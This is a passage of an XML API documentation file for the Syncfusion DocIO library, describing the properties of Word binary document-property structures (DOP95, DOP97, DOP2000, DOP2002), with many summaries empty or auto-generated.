            <returns>Converted UInt16 value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.RotateBits(System.Boolean[],System.Int32)">
            <summary>
            Rotates (cyclic shift) bits in the array specified number of times
            </summary>
            <param name="bits">Array to rotate</param>
            <param name="count">Number of times to rotate</param>
            <returns>Rotated array.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.Round(System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="value"></param>
            <param name="degree"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.Dop95">
            <summary>
            Gets the dop95.
            </summary>
            <value>The dop95.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.Dop97">
            <summary>
            Gets the dop97.
            </summary>
            <value>The dop97.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.Dop2000">
            <summary>
            Gets the dop2000.
            </summary>
            <value>The dop2000.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.Dop2002">
            <summary>
            Gets the dop2002.
            </summary>
            <value>The dop2002.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.Dop2003">
            <summary>
            Gets the dop2003.
            </summary>
            <value>The dop2003.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.Dop2007">
            <summary>
            Gets the dop2007.
            </summary>
            <value>The dop2007.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.Copts60">
            <summary>
            Gets the copts60.
            </summary>
            <value>The copts60.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.EndnoteNumberFormat">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.FootnoteNumberFormat">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.EndnotePosition">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.InitialEndnoteNumber">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.RestartIndexForEndnote">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.InitialFootnoteNumber">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.RestartIndexForFootnotes">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.FootnotePosition">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.ProtectionType">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.ProtectionKey">
            <summary>
            Gets the protection key.
            </summary>
            <value>The protection key.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.OddAndEvenPagesHeaderFooter">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.ViewType">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.ZoomPercent">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.ZoomType">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.DefaultTabWidth">
            <summary>
            Gets or sets the width of the default tab.
            </summary>
            <value>The width of the default tab.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.DxaHotZ">
            <summary>
            Specifies the maximum amount of white space, in twips, allowed at the end of the line before attempting to hyphenate the next word.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.ConsecHypLim">
            <summary>
            Specifies the maximum number of consecutive lines that can end in a hyphenated word before ignoring automatic hyphenation rules for a line.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.SpellAllDone">
            <summary>
            Gets or sets a value indicating whether [spell all done].
            </summary>
            <value>
              <c>true</c> if [spell all done]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.SpellAllClean">
            <summary>
            Gets or sets a value indicating whether [spell clean].
            </summary>
            <value>
              <c>true</c> if [spell clean]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.SpellHideErrors">
            <summary>
            Gets or sets a value indicating whether [spell hide errors].
            </summary>
            <value>
              <c>true</c> if [spell hide errors]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.GramHideErrors">
            <summary>
            Gets or sets a value indicating whether [grammar hide errors].
            </summary>
            <value>
              <c>true</c> if [gram hide errors]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.LabelDoc">
            <summary>
            Gets or sets a value indicating whether [label document].
            </summary>
            <value>
              <c>true</c> if [label document]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.HyphCapitals">
            <summary>
            Specifies the capital letters are hyphenated in a given document
            </summary>
            <value>
              <c>true</c> if [hyph capitals]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.AutoHyphen">
            <summary>
            When 1, Word will hyphenate newly typed text as a background task
            </summary>
            <value>
              <c>true</c> if [automatic hyphen]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.FormNoFields">
            <summary>
            Gets or sets a value indicating whether [form no fields].
            </summary>
            <value>
              <c>true</c> if [form no fields]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.LinkStyles">
            <summary>
            when 1, Word will merge styles from its template
            </summary>
            <value>
              <c>true</c> if [link styles]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.RevMarking">
            <summary>
            Gets or sets a value indicating whether [revision marking].
            </summary>
            <value>
              <c>true</c> if [rev marking]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.ExactCWords">
            <summary>
            Gets or sets a value indicating whether [exact c words].
            </summary>
            <value>
              <c>true</c> if [exact c words]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.PagHidden">
            <summary>
            Gets or sets a value indicating whether [page hidden].
            </summary>
            <value>
              <c>true</c> if [pag hidden]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.PagResults">
            <summary>
            Gets or sets a value indicating whether [page results].
            </summary>
            <value>
              <c>true</c> if [pag results]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.LockAtn">
            <summary>
            Gets or sets a value indicating whether [lock atn].
            </summary>
            <value>
              <c>true</c> if [lock atn]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.MirrorMargins">
            <summary>
            Gets a value indicating whether to mirror page margins.
            </summary>
            <value>
              <c>true</c> if than mirror margins; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.Word97Compat">
            <summary>
            Gets or sets a value indicating whether [word97 compat].
            </summary>
            <value>
              <c>true</c> if [word97 compat]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.ProtEnabled">
            <summary>
            Gets or sets a value indicating whether [prot enabled].
            </summary>
            <value>
              <c>true</c> if [prot enabled]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.DispFormFldSel">
            <summary>
            Gets or sets a value indicating whether [disp form field sel].
            </summary>
            <value>
              <c>true</c> if [disp form field sel]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.RMView">
            <summary>
            Gets or sets a value indicating whether [rm view].
            </summary>
            <value>
              <c>true</c> if [rm view]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.RMPrint">
            <summary>
            Gets or sets a value indicating whether [rm print].
            </summary>
            <value>
              <c>true</c> if [rm print]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.LockVbaProj">
            <summary>
            Gets or sets a value indicating whether [lock vba proj].
            </summary>
            <value>
              <c>true</c> if [lock vba proj]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.LockRev">
            <summary>
            Gets or sets a value indicating whether [lock rev].
            </summary>
            <value>
              <c>true</c> if [lock rev]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.EmbedFonts">
            <summary>
            Gets or sets a value indicating whether [embed fonts].
            </summary>
            <value>
              <c>true</c> if [embed fonts]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.DopInternalData">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.FormFieldShading">
            <summary>
            Specifies whether to apply shading on form fields.
            </summary>
            <value><c>true</c> if form field shading is applied; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.GutterAtTop">
            <summary>
            Gets or sets the a value indicating whether the gutter is at top of the document.
            </summary>
            <value><c>True</c> if the gutter is at top; otherwise, <c>false</c>.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP95">
            <summary>
            Specifies the structure of Dop95.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP95.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP95"/> class.
            </summary>
            <param name="dopBase">The dop base.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP95.Parse(System.IO.Stream)">
            <summary>
            Parses the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP95.Write(System.IO.Stream)">
            <summary>
            Writes the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP95.Copts80">
            <summary>
            Gets the copts80.
            </summary>
            <value>The copts80.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97">
            <summary>
            Specifies the structure of Dop97.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97"/> class.
            </summary>
            <param name="dopBase">The dop base.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.Parse(System.IO.Stream)">
            <summary>
            Parses the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.Write(System.IO.Stream)">
            <summary>
            Writes the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.Adt">
            <summary>
            Gets or sets the adt.
            </summary>
            <value>The adt.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.DopTypography">
            <summary>
            Gets the dop typography.
            </summary>
            <value>The dop typography.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.Dogrid">
            <summary>
            Gets the dogrid.
            </summary>
            <value>The dogrid.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.LvlDop">
            <summary>
            Gets or sets the LVL dop.
            </summary>
            <value>The LVL dop.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.GramAllDone">
            <summary>
            Gets or sets a value indicating whether [gram all done].
            </summary>
            <value><c>true</c> if [gram all done]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.GramAllClean">
            <summary>
            Gets or sets a value indicating whether [gram all clean].
            </summary>
            <value><c>true</c> if [gram all clean]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.SubsetFonts">
            <summary>
            Gets or sets a value indicating whether [subset fonts].
            </summary>
            <value><c>true</c> if [subset fonts]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.HtmlDoc">
            <summary>
            Gets or sets a value indicating whether [HTML doc].
            </summary>
            <value><c>true</c> if [HTML doc]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.DiskLvcInvalid">
            <summary>
            Gets or sets a value indicating whether [disk LVC invalid].
            </summary>
            <value><c>true</c> if [disk LVC invalid]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.SnapBorder">
            <summary>
            Gets or sets a value indicating whether [snap border].
            </summary>
            <value><c>true</c> if [snap border]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.IncludeHeader">
            <summary>
            Gets or sets a value indicating whether [include header].
            </summary>
            <value><c>true</c> if [include header]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.IncludeFooter">
            <summary>
            Gets or sets a value indicating whether [include footer].
            </summary>
            <value><c>true</c> if [include footer]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.Asumyi">
            <summary>
            Gets the asumyi.
            </summary>
            <value>The asumyi.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.CChWS">
            <summary>
            Gets or sets the C ch WS.
            </summary>
            <value>The C ch WS.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.CChWSWithSubdocs">
            <summary>
            Gets or sets the C ch WS with subdocs.
            </summary>
            <value>The C ch WS with subdocs.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.GrfDocEvents">
            <summary>
            Gets or sets the GRF doc events.
            </summary>
            <value>The GRF doc events.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.VirusPrompted">
            <summary>
            Gets or sets a value indicating whether [virus prompted].
            </summary>
            <value><c>true</c> if [virus prompted]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.VirusLoadSafe">
            <summary>
            Gets or sets a value indicating whether [virus load safe].
            </summary>
            <value><c>true</c> if [virus load safe]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.KeyVirusSession30">
            <summary>
            Gets or sets the key virus session30.
            </summary>
            <value>The key virus session30.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.CpMaxListCacheMainDoc">
            <summary>
            Gets or sets the cp max list cache main doc.
            </summary>
            <value>The cp max list cache main doc.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.IlfoLastBulletMain">
            <summary>
            Gets or sets the ilfo last bullet main.
            </summary>
            <value>The ilfo last bullet main.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.IlfoLastNumberMain">
            <summary>
            Gets or sets the ilfo last number main.
            </summary>
            <value>The ilfo last number main.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.CDBC">
            <summary>
            Gets or sets the CDBC.
            </summary>
            <value>The CDBC.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.CDBCWithSubdocs">
            <summary>
            Gets or sets the CDBC with subdocs.
            </summary>
            <value>The CDBC with subdocs.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.NfcFtnRef">
            <summary>
            Gets or sets the NFC FTN ref.
            </summary>
            <value>The NFC FTN ref.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.NfcEdnRef">
            <summary>
            Gets or sets the NFC edn ref.
            </summary>
            <value>The NFC edn ref.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.HpsZoomFontPag">
            <summary>
            Gets or sets the HPS zoom font pag.
            </summary>
            <value>The HPS zoom font pag.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP97.DywDispPag">
            <summary>
            Gets or sets the dyw disp pag.
            </summary>
            <value>The dyw disp pag.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000">
            <summary>
            Specifies the structure of Dop2000.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000"/> class.
            </summary>
            <param name="dopBase">The dop base.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.Parse(System.IO.Stream)">
            <summary>
            Parses the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.Write(System.IO.Stream)">
            <summary>
            Writes the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.IlvlLastBulletMain">
            <summary>
            Gets or sets the ilvl last bullet main.
            </summary>
            <value>The ilvl last bullet main.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.IlvlLastNumberMain">
            <summary>
            Gets or sets the ilvl last number main.
            </summary>
            <value>The ilvl last number main.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.IstdClickParaType">
            <summary>
            Gets or sets the type of the istd click para.
            </summary>
            <value>The type of the istd click para.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.LADAllDone">
            <summary>
            Gets or sets a value indicating whether [LAD all done].
            </summary>
            <value><c>true</c> if [LAD all done]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.EnvelopeVis">
            <summary>
            Gets or sets a value indicating whether [envelope vis].
            </summary>
            <value><c>true</c> if [envelope vis]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.MaybeTentativeListInDoc">
            <summary>
            Gets or sets a value indicating whether [maybe tentative list in doc].
            </summary>
            <value>
            	<c>true</c> if [maybe tentative list in doc]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.MaybeFitText">
            <summary>
            Gets or sets a value indicating whether [maybe fit text].
            </summary>
            <value><c>true</c> if [maybe fit text]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.FCCAllDone">
            <summary>
            Gets or sets a value indicating whether [FCC all done].
            </summary>
            <value><c>true</c> if [FCC all done]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.RelyOnCSS_WebOpt">
            <summary>
            Gets or sets a value indicating whether [rely on CS s_ web opt].
            </summary>
            <value><c>true</c> if [rely on CS s_ web opt]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.RelyOnVML_WebOpt">
            <summary>
            Gets or sets a value indicating whether [rely on VM l_ web opt].
            </summary>
            <value><c>true</c> if [rely on VM l_ web opt]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.AllowPNG_WebOpt">
            <summary>
            Gets or sets a value indicating whether [allow PN g_ web opt].
            </summary>
            <value><c>true</c> if [allow PN g_ web opt]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.ScreenSize_WebOpt">
            <summary>
            Gets or sets the screen size_ web opt.
            </summary>
            <value>The screen size_ web opt.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.OrganizeInFolder_WebOpt">
            <summary>
            Gets or sets a value indicating whether [organize in folder_ web opt].
            </summary>
            <value>
            	<c>true</c> if [organize in folder_ web opt]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.UseLongFileNames_WebOpt">
            <summary>
            Gets or sets a value indicating whether [use long file names_ web opt].
            </summary>
            <value>
            	<c>true</c> if [use long file names_ web opt]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.PixelsPerInch_WebOpt">
            <summary>
            Gets or sets the pixels per inch_ web opt.
            </summary>
            <value>The pixels per inch_ web opt.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.WebOptionsInit">
            <summary>
            Gets or sets a value indicating whether [web options init].
            </summary>
            <value><c>true</c> if [web options init]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.MaybeFEL">
            <summary>
            Gets or sets a value indicating whether [maybe FEL].
            </summary>
            <value><c>true</c> if [maybe FEL]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.CharLineUnits">
            <summary>
            Gets or sets a value indicating whether [char line units].
            </summary>
            <value><c>true</c> if [char line units]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.Copts">
            <summary>
            Gets the copts.
            </summary>
            <value>The copts.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.VerCompatPre10">
            <summary>
            Gets or sets the ver compat pre10.
            </summary>
            <value>The ver compat pre10.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.NoMargPgvwSaved">
            <summary>
            Gets or sets a value indicating whether not to display page boundaries (doNotDisplayPageBoundaries - Open xml format property).
            </summary>
            <value><c>true</c> if [no marg PGVW saved]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.BulletProofed">
            <summary>
            Gets or sets a value indicating whether [bullet proofed].
            </summary>
            <value><c>true</c> if [bullet proofed]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.SaveUim">
            <summary>
            Gets or sets a value indicating whether [save uim].
            </summary>
            <value><c>true</c> if [save uim]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.FilterPrivacy">
            <summary>
            Gets or sets a value indicating whether [filter privacy].
            </summary>
            <value><c>true</c> if [filter privacy]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.SeenRepairs">
            <summary>
            Gets or sets a value indicating whether [seen repairs].
            </summary>
            <value><c>true</c> if [seen repairs]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.HasXML">
            <summary>
            Gets or sets a value indicating whether this instance has XML.
            </summary>
            <value><c>true</c> if this instance has XML; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.ValidateXML">
            <summary>
            Gets or sets a value indicating whether [validate XML].
            </summary>
            <value><c>true</c> if [validate XML]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.SaveInvalidXML">
            <summary>
            Gets or sets a value indicating whether [save invalid XML].
            </summary>
            <value><c>true</c> if [save invalid XML]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.ShowXMLErrors">
            <summary>
            Gets or sets a value indicating whether [show XML errors].
            </summary>
            <value><c>true</c> if [show XML errors]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2000.AlwaysMergeEmptyNamespace">
            <summary>
            Gets or sets a value indicating whether [always merge empty namespace].
            </summary>
            <value>
            	<c>true</c> if [always merge empty namespace]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002">
            <summary>
            Specifies the structure of Dop2002.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002"/> class.
            </summary>
            <param name="dopBase">The dop base.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.Parse(System.IO.Stream)">
            <summary>
            Parses the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.Write(System.IO.Stream)">
            <summary>
            Writes the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.DoNotEmbedSystemFont">
            <summary>
            Gets or sets a value indicating whether [do not embed system font].
            </summary>
            <value>
            	<c>true</c> if [do not embed system font]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.WordCompat">
            <summary>
            Gets or sets a value indicating whether [word compat].
            </summary>
            <value><c>true</c> if [word compat]; otherwise, <c>false</c>.</value>
        </member>
